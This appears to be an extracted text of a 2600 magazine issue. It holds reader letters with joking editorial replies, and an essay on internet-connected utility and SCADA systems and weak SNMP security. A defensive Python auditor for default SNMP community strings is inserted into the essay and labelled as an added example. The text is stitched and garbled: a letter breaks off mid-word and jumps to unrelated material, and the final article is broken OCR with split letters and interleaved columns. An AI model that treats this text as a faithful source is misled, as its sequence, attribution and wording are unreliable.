We don't do links ourselves but we certainly don't
mind anyone linking to us however they please. And
even if we did mind, we don't believe we would have
any right to object. It's amazing that so many people
live by rules that basically make no sense.
Dear 2600:
I write following finding your site on the web after
many years of being very busy with an IT career
and making stupid mistakes such as getting involved
with relationships. I became aware of 2600 many
years ago but never really got into practical things. I
noticed that there is a meeting in Glasgow, Scotland.
Can you give me any more information regarding
this or indeed if it still happens. I look forward to
your response.
Liam/M/37
The only way to know if it's still happening is
to go there and see. Even if nobody else shows up,
there's nothing stopping you from breathing new life
into it. But we appreciate being told if the meetings
die out so we don't have to squish so many of them
onto page 66. Lately it seems as if everyone is complaining
about the tiny type.
Dear 2600:
2600 is the best magazine ever, but the tiny type
is killing me as my eyes are getting worse and worse
every year. Have you ever thought of having an email
version of the magazine that people could subscribe
to? I would love to get my 2600s as a PDF, DOC, or
maybe just a plain old text file. One thing it would
save is me having to type in the programs. I could
just copy and paste instead. In the meantime, keep
up the great work and I'll just buy a more powerful
magnifying glass.
SAR
We now put all of the code up on our website
so you don't have to retype any of it. We're always
looking for new and innovative ways of doing things.
The latest is our 900 page book of some of our best
articles which is just hitting the shelves with much
larger type.
Summer 2008, Page 35
Dear 2600:
How can I use the services of a hacker?
etsjobs
Whereas most religions require you to pray or do
some sort of penance in order to obtain the goods
and services you desire, with hackers you have but to
ask and pay our nominal fee. Obtain any password,
change any grade, even travel back in time when
necessary! Your wish (plus the fee) is our command.
Now go tell all your friends.
Dear 2600:
I would like to get your new book called The Best
of 2600: A Hacker Odyssey when your book comes
out in July 2008. Where can I buy your new book?
And what does your new book cover? Can you send
me some printout of the Table of Contents of your
book called The Best of 2600: A Hacker Odyssey?
And what will your new book cost? Also, can we buy
this book from you? Would you please send me any
info you have about your new book? I will be looking
forward to hearing from you. And to getting your
new book.
John
We believe you're referring to our new book. It's
available everywhere, both online and in bookstores.
It retails for $39.99 and covers the three decades that
2600 has been around. We don't sell it ourselves as
it's sold directly through the publisher (Wiley). We're
real happy we could finally pull this off and get so
much of the historical material we've published since
1984 out into the mainstream. Let's hope it does well
so we can do more fun projects like this.
Dear 2600:
Urgent! I need a new identity for me and my
daughter because we are victims of abuse illegally.
Send me information please.
Eva
Do you really believe that emailing total strangers
is the best way to start a new life? We're not the
witness relocation people but even if we were, it's
not the kind of thing you do casually. You can find a
whole lot of tips on the net about how to hide and/or
protect your privacy. Advertising your problems to
anyone who will listen is probably the first item on
the list of things not to do.
Dear 2600:
I have this stupid "ShopAtHome SelectRebates"
thingie in my toolbar that refuses to be deleted. How
do I get rid of the program In Toto? I mean, I went
into the "Program Files" and deleted all that I could,
but there were some things that refused to be deleted.
What gives?
Z
You need a decent malware/adware/general crap
removal program that isn't worse than the stuff it's
supposed to be getting rid of. We're not going to recommend
one over another because it'll just start endless
bickering that none of us will live to see the end
of. Look at the platform you have and find some programs
that will run in your environment, then look
for user reviews of their performance before actually
installing them. And in the future, be careful of what
you download or open on your system as this is how
such garbage gets there in the first place.
Dear 2600:
I found your journal in a Borders, bought it
quickly, and was pleasantly surprised. It's provided a
useful resource to the digital image research I do that
I'd prefer not to say anything else about. I do have
a question for you and your 2600 readers: Is there
a method for finding and restoring metadata that's
been purposely erased from digital images? This information
could be quite, quite useful. Keep up the
good work.
Haestar
This sounds like material for a really informative
article if someone out there has done the research.
Dear 2600:
I have put together an article that I would like to
submit to 2600 for your consideration. Do you have
an editorial calendar and guidelines available or can
I just submit the article? Can I include exhibits? Do
you prefer a Word document or PDF files? Please let
me know.
R
Just send us what you've got. We can read most
anything but to be safe always send along a plain
ASCII text file. The email address is articles@2600.com.
Dear 2600:
let me in . . . so what do i have to do to get in? im
trading code to this guy for nice computers. usenet
would nice. it would be nice. im going to have a
mindset with nuemonic reach and a storage partition
of a 100 gb with terrar process. but i dont have
any other
Phobus
No, you certainly don't.
Dear 2600:
Do you folks accept press releases? We recently
announced a new software product that we think is
really timely: an easy to use drive migration utility.
Can we send you our press release or a copy of the
software to review?
Would much appreciate a reply.
Donna
We accept all kinds of crap from people and we
suspect a bunch of press releases would fit that definition.
But we'd rather not have to wade through a
pile of public relations nonsense in order to get to
the words of our readers, which is what the email address
(letters@2600.com) you contacted is set up for.
Oh yes, and we also don't send out personal replies.
But you knew that.
Dear 2600:
Best greets from Austria. It's really hard to get a
copy of 2600 here, but congratulations to your great
magazine.
A friend of mine and I have written an article
about the basics of the lockpicking sport. The article
contains an introduction to the sport in general, a
short explanation of the link between hacking and
lockpicking and the basic techniques like picking and
bumping. Impressioning is not covered in the article.
Are you interested in this kind of article? Do you
also ship magazines to Austria? Do you have a partner
here?
Tom
We have many partners in crime in Austria, but so
far no partners in magazine distribution. Your best bet
is just to get a subscription and have it mailed to you
directly from us. And of course we'd be interested in
seeing your article.
Dear 2600:
Tell me how much one of your hackers would
charge me to delete my criminal record from the
Texas police database.
[Name Deleted]
Well, we would start with erasing your latest
crime, that of soliciting a minor to commit another
crime. (Your request was read by a small child here
in the office.) After you're all paid up on that, we will
send out the bill for hiding your identity by not printing
your real name, which you sent us like the meathead
you apparently are. After that's all sorted, we
can assemble our team of hackers, who sit around
the office waiting for such lucrative opportunities as
this to come along, and figure out even more ways
to shake you down. It's what we do, after all. Just ask
Fox News.
Dear 2600:
I have a lot of hacking related pics on my phone
and I was wondering how I should get them to you in
a usable format since I do not have anything that will
hook up to my computer to get the pictures off of the
phone. Any advice would be very helpful.
erik
It seems odd that you have a picture phone with
no means of sharing pictures. If you can use email
on your phone, you could always email them to us.
If that doesn't work, you're just going to have to send
us the phone. (And don't forget the charger.)
Dear 2600:
Here I am plowing through a shameful backlog
of one year's worth of 2600. Whilst taking a break, it
occurred to me to investigate how much I've spent on
2600 since I started purchasing at the newsstand in
1995. I have a collection of about 44 issues with an
approximate average price of $5.65. I've spent about
$250 on 2600 over the years. So, I'm kicking myself
for not considering a lifetime subscription sooner.
Do you guys think you'll be able to keep on trucking
at least another ten years so I could get more bang for
my buck upon ordering a lifetime subscription?
Also, are lifetime subscriptions transferable or
does it absolutely end with me? Let's say, for example,
one of my children takes a liking to your magazine
and I become a penniless widower stricken with
glaucoma. Can my child then carry the mantle of
2600 reader of the family on my $260?
Aside: does 2600 have a game plan if one or
more of the critical staff is met with injury or death
that prevents them from working on the magazine?
Have you tapped anyone to take over the reins if the
life of the magazine outlasts those of critical staff
members?
I apologize for my questions spiraling towards
the morbid. I'm at that age where life and death seem
to be occurring in equal quantities.
Acidevil
Well, thanks for depressing the hell out of all of
us. Clearly we need to start thinking about how to
incorporate death into our business plan. We'll try
to get on it. But first we need to get through The Last
HOPE.
Lifetime subscriptions really are intended for your
(or our) lifetime. When one of those ends, the subscription
ends. It's not meant to last for the lifetime of
the human race, as you are apparently already plotting
to do through your future unborn generations.
If this kind of abuse prevails, we might have to cap
these subscriptions at 120 years or however long
people are living to these days.
We'll make every attempt to live long enough to
ensure that you get your money's worth from your
lifetime subscription. This is the solemn promise we
make to all of our readers.
Dear 2600:
I subscribed in December of 2007 and have only
received the first quarter mag. Has the second quarter
gone out yet?
chris
Yes, and you really should have gotten it. Please
let us know if you see this.
Dear 2600:
I'd like to publish two articles, can I meet a staff
member?
Musique Maison
Not so fast there. You don't get a personal visit
until you publish 20 articles! Nice try though.
Dear 2600:
What do you think about LifeLock? Seems to me
that just some common sense protection of your personal
information is enough. The adverts seem a little
extreme, with the guy sharing his SSN and all.
eroOcool
You're referring to the company whose CEO goes
around advertising his Social Security number saying
that he has nothing to worry about because he uses
the service he's peddling to protect his identity. All
this tells us is that the availability of SSNs has gotten
so common that it's almost a trivial detail at this
point. We're expected to give them to the phone
company, employers, banks, schools, and virtually
anyone who asks for them. Since so many people still
don't know how to say no, a whole business based
on fear has popped up under the guise of protecting
you from exploitation. You really don't need a company
to do this. As you say, a little common sense
goes a long way. Keep your private information to
yourself, don't advertise anything about your private
life on the Internet that you wouldn't want Charles
Manson to know about, and keep a close eye out for
any electronic transactions that may not be yours.
Like any disease, prevention and early treatment will
go a long way.
Observations
Dear 2600:
First off I need to apologize if my English seems a
bit weird. I speak German as my native language and
I am not 100 percent bilingual. Recently I enjoyed a
laugh while trying to call a friend of mine who lives
in New York city. I dialed 718-238-9901 by accident
(friend's number is actually a couple of digits off) and
received the recorded "station 10" for the 77th Street
DMS-100. If rock and roll fans who call this number
think "The King" is dead, turns out he's been working
for Verizon this whole time.
Anyhow, I have been reading 2600 for at least
a couple of years now and am enjoying what I am
reading. I really find it interesting especially with
regard to the telephone articles. I get a kick out of
calling some of the odd telephone numbers sent in
occasionally by readers and I even bought a Track
Phone not too long ago just for phone exploration
of this type.
Ride tuff and always have your Track Phone
handy. Thankya ver' much.
fOxR4c3r
That recording has been around forever, well before
Verizon even existed. In the New York area, the
9901 suffix is often used to identify the switch type
of a particular exchange. It used to be that dialing
anything in the 99xx series would hook you up to
something being run by the phone company. 9970
would always get you a busy signal, 9971 a fast busy
(reorder), 9979 a sweep tone, and 9950 oftentimes
would connect you to the business office. These days
you could easily wake up a customer in the middle
of the night if you try any of these numbers as they're
now being used as non-magical extensions.
Dear 2600:
Yesterday I was passing through Venice airport
and attempted to use an Internet point. This Internet
terminal interested me as it was a free standing kiosk
with the option to open files from a pen drive. So I
inserted mine so I could open my exploit - I mean
photos - from my pen drive. Next thing I was being
prompted that I must have my passport snapped
by the kiosk's webcam before I can access the machine
. . . something about the Italian government
requiring it. Of course I didn't offer it anything and
after a few moments the machine prompted for another
photo to be taken. So I didn't agree to have my
ID photographed and pushed the refund button, but
nothing happened. This has to be against some law;
there was no indication until I inserted my money
that my ID would have to be recorded, and when I
didn't agree to these terms, I was not given the option
of a refund. The kiosk's owners just made a quick
buck from me with absolutely no return. Does anyone
know if this is normal practice or does it happen
in any other countries? 2600 readers, beware of such
terminals.
Pdraig
We doubt such a thing would be tolerated for
very long over here, unless people were told it was
needed for homeland security or something. And
what are the odds of that? But it would be helpful to
expose the name of the company running this kiosk
and stirring up some outrage about these practices.
That's the very definition of civic duty.
Dear 2600:
Just recently I've been interviewing for jobs in my
area and noticed a few things. One is that it seems
like all senior network engineers like to brag about
their networks, which could make for an outstanding
social engineering experiment. For example, I interviewed
with a university in my area and the guy went
really in depth with what they use and/or plan on
using. I would think these people would only divulge
information that is necessary to gain an understanding
of what the applicant skills are. The second thing
is that if you are trying to get into an information assurance
career, good luck. You won't even get someone
to talk to you unless you have taken and passed
the CISSP. I don't understand how this makes you any
more knowledgeable. I've worked with a few people
who have had this cert and all they did was cram
for it weeks in advance to pass. After taking it, they
dumped all the information that they learned. Maybe
you could shed some light on how this cert became
so popular.
tim
It's really not much more than the power of suggestion.
Dear 2600:
I'm not sure where to submit my take on the
cover submission (24:4) but I hope it gets to the right
place.
My take is that the saying is "Abandon Hope all
ye who enter here." Which is the inscription above
the gates of hell. Basically, the date and the sky and
statues above the entrance are saying this to me.
Abandon Hope, for this is the end of the Hotel Pennsylvania.
And that this is truly the last time we will
be getting together here. It's the apocalypse for the
hotel. My clues came from the "make reservations
to attend" on page 64, and of course Google for the
other information.
If I'm wrong or on the right track, please let me
know.
CJ Lorenz
We will.
Dear 2600:
I'm writing you concerning my cell phone service
with T-Mobile. Over a year and a half ago I noticed
that I was able to hear the person calling before
hitting the answer button. My phone is always on
vibrate, and I can hear the person speaking quite
clearly. I've showed this interesting problem to several
friends, so I know it isn't in my head.
Six months ago I bought a new phone, and before
being able to purchase it, the T-Mobile worker
had to mess with my account information on their
computer. Needless to say, within minutes of walking
out of the store I was experiencing the same problem.
I have since switched back to my old phone, and
it no longer happens. I don't have a history of mental
illness, nor do I tend to be overly paranoid. Obviously
it would be very easy to experience a lot of
paranoia in this situation but I've been doing my best
to stay grounded and logical.
I've asked several people and even called T-Mobile
about this issue. They all have said the same
thing: it's not possible. Surely it is or otherwise I
wouldn't be writing this letter. I was hoping the
2600 staff or loyal readers might have some words of
knowledge for me.
rmpants
This isn't the first time we've heard people swear
this has happened to them. We've also heard people
say they can hear the called party before they answer.
In your case though, we're curious as to what
you believe the risk is to you if you can hear people
speaking before you answer their call. Also, why exactly
are they speaking before you pick up? We think
you should use this opportunity to run all sorts of
experiments.
Dear 2600:
I was listening a while back to one of your Off
The Hook podcasts where you were discussing stopping
people's snail-mail by USPS over the Internet
with no verification. Thought you might like this.
I live in Ireland and recently I switched my mobile
operator. In Ireland all the rage is that you are
allowed to keep your old phone number when you
switch. So this is what I wanted. The lady asked what
my old number was, so I told her. Since I was getting
the pay-as-you-go plan, I did not have to provide my
real name or anything, and the lady even confirmed
this for me when I asked about it. At the end of the
process she thanked me, and handed me the new
SIM card (which cost nine euros and came preloaded
with ten euros worth of credit). I asked if that is all.
She replied that it would take up to 24 hours for the
phone number to change. (It actually took about four
hours.) No verification of any kind that I own this
phone number! They even promised to do all the paperwork
in three minutes or you get 30 euros worth
of credit. Note for North American readers: in Europe
some banks offer the ability to verify/approve
bank transactions (like purchases with your credit
card, wire transfers, etc.) using SMS/texting on your
mobile.
Si King
Dear 2600:
I just received my new sweatshirt. Thanks for the
very quick delivery. It had the following effect on my
family members:
1) wife - rolled her eyes and made some kind of
grunting sound.
2) son, age 12 - "Cool sweatshirt Dad. Did you
get me one?"
3) daughter, age 9 - "Is 2600 the price?"
4) daughter, age 7 - "Mom farted."
Bob
At least now we know what the grunting sound
was. Very similar conversations take place in all sorts
of households around the world when 2600 clothing
makes its entrance.
Dear 2600:
As someone who hates getting ripped off, I've
disabled text messaging on my AT&T account. Unfortunately,
this means I can neither send nor receive
text messages, but fortunately it also means I'm not
paying extra for something that transmits an infinitesimal
amount of data when compared to voice calls.
I found out recently that I can still receive multimedia
messages from my friends' phones. A message
is sent to my phone via AT&T which directs me to go
to a website to view my multimedia message
(http://viewmymessage.com). A username and a password
is provided in the message to my phone, and I have
six days to look at the message before it expires. After
entering the username and password, I was taken to
a page that displayed the to, from, subject, date, and
size of the message, along with my multimedia message
(usually an image) embedded in flash.
I'm pissed that they'll offer me six days to view
messages sent to me with no option for saving the
information! I'm not too experienced with working
around embedded flash, but I know it can be done.
Another interesting tidbit, regardless of username
and password, after entering your info all users are
redirected to the following URL:
http://www.viewmymessage.com/en/webnonsubscriber/viewmessage.do.
There was some interesting info in the page
source, but I was unable to use it to find any info
on exactly where my image was (nor to find multimedia
messages intended for other subscribers). Just
thought I'd share this info in hopes that someone out
there with the know-how will explore it more thoroughly
than this n00b.
Noli
Incidentally, we have a very interesting piece on
text messaging in this issue's "Telecom Informer" on
page 13.
Dear 2600:
After reading some of your most recent issues, I
noticed the white boxes on your new spines (which
just look awesome, for the record) and noticed that
they seem to be forming letters of some kind after
comparing the spines of two recent issues.
It appears that they make some sort of word/phrase
when placed together in order, but I can only
extrapolate from the 24:4 and 24:2 issues. So, what's
the "Secret Word" here? My best guess is "FUBARIFIC"
but I know that's not right because I'm more or
less guessing on the last three letters.
Jigsaw
We only got as far as four of the eight issues needed
to make it complete (not in issue order, either).
But two things happened that hastened the project's
demise. One was that the new binding sucked and
was causing our readers much distress. The other
was that some of our smart alecky readers had already
figured out the message a full year before it
was supposed to be finished. The secret word was
"Surprised?" We certainly were.
Dear 2600:
At the end of my article from 25:1 on Wikipedia
it states that the AfD on Ebony Anpu was overturned
by the "Deletion Review Administration Page." This
is incorrect. I could not outmaneuver the Administrator
I call Jeffrey who locked the page so that it could
never be recreated at all without Administrator support
(a strange action, to be sure):
http://en.wikipedia.org/w/index.php?title=Ebony_Anpu&action=edit
As per Martin Eberhard's excellent suggestion
to make a plug-in called "Haystack" which makes
search noise, there is currently a Firefox plug-in
called "Track-Me-Not" which I enjoy and acts similarly.
Barrett Brown
Dear 2600:
I still cannot tell whether the expression of disappointment
over the newspaper and TV news accounts
in your documentary (Freedom Downtime)
is genuine or is meant to be ironic. I would have
thought that, by the mid 90s, everyone already knew
that the "major" outlets were providing entertainment
instead of information.
In case you have not run across it already, I will
recommend David Simon's stuff from the March
2008 issue of Esquire about his time at the Baltimore
Sun. It helps with the perspective. Of course,
he presented it as entertainment, too, so keep it in
perspective. The URL is
http://www.esquire.com/features/essay/david-simon-0308
Other than that, I liked your documentary. I
wish it had a better ending.
Peter Di Giovanni
Simon's cynicism about the plight of newspapers
and the media at least led him to write and produce
"The Wire," a project that finally made the invention
of television worthwhile.
Dear 2600:
I used to collect comics and was bored one night
and thought "hey, why not read one of those old
comic books you have lying around?" So I did. This
comic was Ghost Rider 2099 (issue number one,
published in 1994), an odd futuristic version of the
original comic published (and made into a movie)
by Marvel. I was reading through it until the main
character "zero" was speaking to one of his cohorts
over a video payphone. When he was reporting
about the casualties of the fight he had just escaped,
he said "Phrack and 2600 are dead. Warewolf too,
maybe." A coincidence? I think not. Hopefully the
writer of Ghost Rider 2099 (Len Kaminski) wasn't
trying to make a statement about Phrack and 2600,
but I thought you would like to know anyways.
lo$er
It's amazing the things you can find by reading
comics. We just hope Warewolf is OK.
Dear 2600:
First, I would like to compliment you on the
change from a glued to a stapled binding. It's easier
to fold the mag in half and read from edge to edge.
Second, I look forward to my new issues of 2600
as the articles are all very cool, in particular "Hacker
Perspective" and "Telecom Informer." I know some
users prefer more tech articles and how-tos but one
can always Google, newsgroup, and even read basic
stuff like "Hackers for Dummies" and even the
whole "Steal this Computer Book . . ." series.
Lastly, I enjoy the blend of philosophy, politics,
and technology that you achieve and wanted you
to know that when you raise your prices in the near
future as I think you must, I will still subscribe. The
mere $6.25 an issue is pennies when compared to
the wealth I find in your mag. It's the single most
valuable mag that I subscribe to and I have many,
Wired being the worst piece of trash, but it's free.
aurfalien
Dear 2600:
I just finished 24:4 and thoroughly enjoyed it. I got to thinking (yes, most people would rather die than think - it's so much like work) and decided to let you folks know the value, enjoyment, and safety I have received from my reading of 2600.
As a physician I had been in private practice and am now semi-retired. I managed our admittedly small, five computers with router, hub, etc., network for the integrative care practice. Knowing that the Windows environment was a major problem and nearly impossible to secure, my consultant and I chose to use SuSE Linux 8.2 (yes, a bit ago) for the principal server, with Samba as the interface since we were required to use WinBlow$ XP Pro as the client OS due to software issues.
Having only Knoppix as my intro to Linux, the first year was a nightmare of a learning curve and 1-2 am as day's end was common. The SuSE admin manual was as frequent an occupant of my desk as both 2600 and Linux Pro. By the second year the admin manual was mostly on the shelf but 2600 remained on the desk.
The move to 9.2 was a bit rocky but went okay overall. The equipment was HP Pavilion 733 series. While that wasn't very remarkable, HP's policy regarding their hard drives was. I didn't think much about it when we set up the server as wholly Linux by the expedient of squishing WinBlow$ into a little bitty 24 GB partition. Yes, it still ran but it was essentially out of my way. I set up my personal machine as a dual boot with Win (24GB)/Linux (65GB). I would have ditched Win entirely but the office management and EMR was Win only now, though originally written for Linux. I still bless Samba and Cups!
Now the oddness. I had an occasion that forced me to call HP for a hardware issue. The Ethernet card mostly died but WinBlow$ saw it as good. I didn't think anything of answering the tech's question about the OS setup and that it was dual boot with Win essentially compacted. I was told that I had voided my warranty and got hung up on.
After several calls and good old Marine Corps stubbornness I spoke with a supervisor that explained that I had voided the hardware warranty by removing the installed OS. Then the fur flew! I finally got a copy of the hardware warranty in writing and sure enough you void it if you remove it. I found this a particularly disturbing tactic by Windows/HP. So after going round and round, I finally convinced them that there was nothing that prevented me from a dual boot setup so long as I did not "remove" the pre-installed OS (XP-Pro). Eventually the whole issue was bumped to a case manager who not only was Linux competent (and not allowed to address Linux issues) but understood that I had not voided the warranty and even set up a remote connection to screenshot and verify it to end the hassles downstream and attempts to void the warranty. As it turned out he was also a 2600 reader though he asked me not to repeat that to other HP folk. It was through a 2600 article that I found a way to test the e-card from the Linux partition and the Knoppix as well determining that the card was indeed bad and it was eventually replaced.
So in closing, it was through my using 2600, Linux Pro, and similar periodicals that I learned things to help me protect and service my network and keep it up and running. Thank you very much 2600 staff and may the PTB never prevent your information from reaching those who need it. I would appreciate it if you would just use Dr. C rather than my full name. I do have a few patients who are computer literate.
Dr. C.
Critique
Dear 2600:
In Forensics Fear (24:4), Anonymous Chi-Town Hacker writes a pretty pointless article filled with obvious errors and making vague references to stir up some random fear. I just wanted to point out a few so that others would see that he's full of #@*%. First, he starts off with claiming there's new software that runs your system and gives a process name (although it can be changed, he claims) and then goes on to say that it runs underneath the OS and is OS-indep
us during the show at +1 212 209 2900.
Email oth@2600.com with your comments.
by Porter Pyne
I was listening to a recent edition of 2600's weekly audio program Off The Hook, and I heard the host, Emmanuel Goldstein, asking the question, "Why does this computer need to be connected to the internet?"
Ah. An excellent question, and one that is more complicated and convoluted than one might think at first.
I used to work at an unnamed electrical utility. Much of my experience comes from that and from previous work experience as a network administrator and engineer.
So, why are computers that seemingly have no need for internet access connected to the internet?
The short answer: Laziness and expediency.
Even as a security-conscious network administrator, I was inevitably confronted with situations like this one: Someone would tell me, "We have this computer that needs to print labels for visitors to the utility."
"Ok," I'd think. "Sounds like a standalone application."
Then, I'd be told, "We would also like to be able to maintain a list of visitors," and suddenly the system needed to have a database.
Finally, I'd be asked, "Could we also have access to that database from other locations on the LAN and publish the information on the internal web server?" This means that I'd need to give the system network access and easy access for anyone, especially an intruder.
Because network access also inevitably means internet access, we now have the proverbial highway to hell. This machine could have been standalone, if only the corporate management nitwits had allowed it to be that way.
Other reasons for connecting machines to a network include access to network printers; access to the machine for management reasons such as remote access or support, antivirus updates, and the like; or the need for the computer to be able to access or store files on file servers.
So, because Information Technology departments are poorly managed, and workers and administrators already have an overabundance of daily work and artificial and real IT emergencies, it is expedient to be able to access all computers, workstations, printers, alarm systems, and so forth from network management consoles, IT department PCs, and antivirus management servers.
Of course, since IT managers have lower ethics than the average third-world dictator, we must also be able to monitor the usage of each PC, including any web browsing that might be done from that PC. The fact that monitoring an employee's web browsing is tantamount to mental rape is not an issue. In the United States and some other countries, anything done on business computers is subject to monitoring by the IT department. You have no rights to privacy on work computers, period. Whether this is right or wrong is immaterial; it is the law.
Because of all this, computers that have no business being on Internet-connected networks quite inevitably end up on them.
Most people would be surprised to know that electrical grids, water distribution systems, and many other critical infrastructure elements are connected, one way or another, to the internet. If they aren't connected to the internet, they are connected to modems for dial-in access. Because of modems' low bandwidth, we are seeing lower utilization of modems as time goes on. Shivas and other RAS devices have all but dried up, as the applications that used to require modems are now utilizing internet connectivity.
Yes, it is indeed possible to breach these systems with rootkits, buffer overflows, or other tricks of the trade; to install VNC or other remote access software and thus open and close floodgates or gain control of electrical grids; to compromise medical computers with diagnostic images; or to do other terrifying things. The potential for mass mayhem and massive loss of life cannot be overstated. The United States and many other countries have a ticking time bomb of massive proportions within the IT infrastructure they have grown addicted to having access to.
To date, I have not seen any major catastrophes related to computer intrusions. By major catastrophes, I mean events that would make natural catastrophes like Katrina, earthquakes, and tsunamis seem small. I attribute this to incredibly good luck and to the fact that the people that want to harm us have not spent any significant effort, or they have not had the mental acuity to perceive the possibility of what they could accomplish.
Even though better security is always an option, budgetary reasons usually prevent it from being pursued. VLANs do not provide substantive security, as switch security is usually questionable. SNMP is a security nightmare, and most switches in use can be compromised with the typical public and private SNMP community strings. VLANs and switch port assignments can then be reassigned rather easily. So, if VLANs are not the answer, are separate networks a possibility?
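A defender's check for the SNMP weakness described above, as an added example that is not from the original article: a small Python auditor that scans saved device configurations for default or unrestricted community strings. The device names, community strings and addresses are constructed sample data, and the two line formats it recognizes are Cisco IOS `snmp-server community` and net-snmp `rocommunity`/`rwcommunity`.

```python
import re

# Vendor-default community strings; the article names these two.
DEFAULT_COMMUNITIES = {"public", "private"}

# Cisco IOS style: snmp-server community <string> [view <name>] [ro|rw] [<acl>]
IOS_RE = re.compile(r"^\s*snmp-server\s+community\s+(\S+)(.*)$", re.I)
# net-snmp snmpd.conf style: rocommunity|rwcommunity <string> [<source> ...]
NETSNMP_RE = re.compile(r"^\s*(ro|rw)community6?\s+(\S+)(.*)$", re.I)

# Constructed sample configurations (not taken from any real device).
SAMPLE_CONFIGS = {
    "access-sw1": (
        "hostname access-sw1\n"
        "snmp-server community public RO\n"
        "snmp-server community private RW\n"
        "snmp-server community n0c-Mon1tor RO 10\n"
        "!\n"
    ),
    "core-sw1": (
        "snmp-server community Xk29-qpT view MGMT RW\n"
        "access-list 10 permit 192.0.2.10\n"
    ),
    "poller-host": (
        "# snmpd.conf (constructed)\n"
        "rocommunity public default\n"
        "rwcommunity s3cr3t-rw 192.0.2.0/24\n"
        "rocommunity m0nitor-ro\n"
    ),
}


def parse_line(line):
    """Return (community, access, restricted) or None if not an SNMP line."""
    if line.lstrip().startswith(("!", "#")):
        return None                            # comment in either format
    m = IOS_RE.match(line)
    if m:
        access, restricted = "ro", False       # IOS defaults to read-only
        tokens = m.group(2).split()
        i = 0
        while i < len(tokens):
            tok = tokens[i].lower()
            if tok == "view":                  # skip the keyword and the view name
                i += 2
                continue
            if tok in ("ro", "rw"):
                access = tok
            elif tok != "ipv6":                # any other token is an ACL reference
                restricted = True
            i += 1
        return m.group(1), access, restricted
    m = NETSNMP_RE.match(line)
    if m:
        source = m.group(3).split()
        # In snmpd.conf the source "default" means "any address".
        restricted = bool(source) and source[0].lower() != "default"
        return m.group(2), m.group(1).lower(), restricted
    return None


def classify(community, access, restricted):
    """Map one community definition to a severity, or None if acceptable."""
    is_default = community.lower() in DEFAULT_COMMUNITIES
    if is_default and access == "rw":
        return "critical"      # guessable string that can rewrite the config
    if is_default:
        return "high"          # guessable string that exposes the device state
    if access == "rw" and not restricted:
        return "high"          # write access from any source address
    if not restricted:
        return "medium"        # read access from any source address
    return None


def audit(configs):
    """Return (device, line_no, severity, community_shown, access, restricted)."""
    findings = []
    for device, text in configs.items():
        for line_no, line in enumerate(text.splitlines(), 1):
            parsed = parse_line(line)
            if parsed is None:
                continue
            community, access, restricted = parsed
            severity = classify(community, access, restricted)
            if severity:
                # Never echo a non-default secret into a report.
                is_default = community.lower() in DEFAULT_COMMUNITIES
                shown = community if is_default else "<redacted>"
                findings.append(
                    (device, line_no, severity, shown, access, restricted))
    return findings


if __name__ == "__main__":
    for dev, line_no, sev, shown, access, restricted in audit(SAMPLE_CONFIGS):
        scope = "source-restricted" if restricted else "any source"
        print(f"{sev.upper():8} {dev}:{line_no} community={shown} "
              f"access={access} ({scope})")
```

The only definitions that pass are non-default strings bound to an ACL or source network; everything else is reported with the secret redacted unless it is one of the defaults.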
Sometimes. But you know what happens. Inevitably there is some "business need," usually imaginary, that necessitates the connection of the secure network to the main production, internet-accessible network, thus making the "secure network" insecure. The connection of secure to production networks can be done through a firewall, but this is still substantially less secure than "not connected." The lamentations and death gasps of the network administrator are for naught; if something can be connected with copper or fiber, it will eventually be connected.
Only in rare cases, in companies or government organizations that have some grasp of security, do we end up with computer facilities that are secure from the internet. This is the exception rather than the norm.
In Bruce Willis's movie Live Free or Die Hard, Bruce Willis and the kid hacker have to physically go to electrical transmission and generation centers to get access to the power grids. This, unfortunately, is wishful thinking.
Even if the entity responsible for maintaining that grid uses something approaching a reasonable security policy, they are connected, presumably over a secure network (yeah, right), to computers maintaining downstream distribution grids that are not as secure. You are only as secure as the weakest link in your armor, and smaller distribution grids are the Achilles' heel of electrical grid security. Related to this, SCADA (System Control And Data Acquisition), which is used to control electrical and hydro facilities, has its own set of security problems. A facility in Idaho, maintained by the Department of Energy, performs research into cybersecurity issues that pertain to SCADA systems. They perform demonstrations for interested, Government-approved parties to show how SCADA systems can become compromised.
A concentrated attack on SCADA, EMS, telephone, traffic control, E911, and Internet services is the current-day cyber-armageddon. Industry representatives rant that such a scenario is beyond the bounds of possibility, but we know better, don't we?
I won't spell out, anymore than I already have, how such a nightmare scenario could be achieved, but the astute reader should be able to read between the lines, to Google or Wikipedia anything they need to know more about, and to arrive at a conclusion similar to mine. All of the typical attack vectors are in play: internet access, security vulnerabilities in computers and networks, and social engineering.
The innocent question posed by the Off The Hook host has very real and demonstrably dangerous ramifications that are prevalent throughout the infrastructure of the United States and the world.
The best answer for why a computer is connected to the internet is because it can be done.
The way to mitigate this problem is to have good security personnel that are allowed to perform their jobs. This means having a security policy that is adhered to using security devices that provide a significant level of layered security, using security devices that are themselves secure, using applications and operating systems that are secure, and having secure virus protection, which may in fact not be possible. The best security policy for any machine is for it to have no network connection, no modem, no software updates, and no antivirus software, and for all input to be entered by a little old lady from Kentucky. Why no antivirus software? Because, as some of my referenced material and other internet-accessible material point out, antivirus software is rampant with insecure coding that can itself be an attack vector for compromising a computer. So, scan the machine with an antivirus program when it is set up, but don't install any antivirus software. Indeed, after the initial install, don't install any additional software. If it works, don't fix it; if it's secure, don't booger it up or risk a virus infection by adding new software. Remove the floppy drive, and put glue from a glue gun into the network, modem, and USB ports. Why the little old lady from Kentucky? She doesn't fit the hacker profile, but are we really sure about her? I think I saw a copy of 2600 and a Phrack printout inside her handbag, along with a USB thumbdrive labeled "rootkits."
Some of these security measures are not within the grasp of some business environments, but some of them are possible, with the most fundamental and most critical piece being the security policy.
What is the best recipe for a good security policy? That is the topic for another article.
References
"Anti-virus protection gets worse," http://www.channelregister.co.uk/2007/12/21/dwindling_antivirus_protection/
"Unix admin tried to axe power grid," http://www.infoworld.com/cgi-bin/redirect?source=rss&url=http://www.infoworld.com/article/07/12/14/Unix-admin-tried-to-axe-power-grid_1.html
"Haxdoors of the Kaspersky Antivirus 6/7," http://rootkit.com/newsread.php?newsid=778
"Computers' Insecure Security," http://www.businessweek.com/technology/content/jun2005/tc20050617_1613_tc024.htm
by Peter Wrenshal l "I t' s none of my bus i ness, " I thought. But
as I say, i n those days I was fi xed on the i dea
I enj oy readi ng your magazi ne, and though of worki ng wi th computers, and i t wasn ' t l ong
am not a computer hacker or cracker, I before my cur i osi ty got the better of me. I went
thought you mi ght be i nterested to hear about i nto the offi ce, and crouched down to take a
how l ance nearl y got arrested for hack i ng and l ook. There was a manufacturer ' s decal on t he
ended up worki ng as a secur i ty consu l tant. front of the mach i ne but noth i ng el se. I l ooked
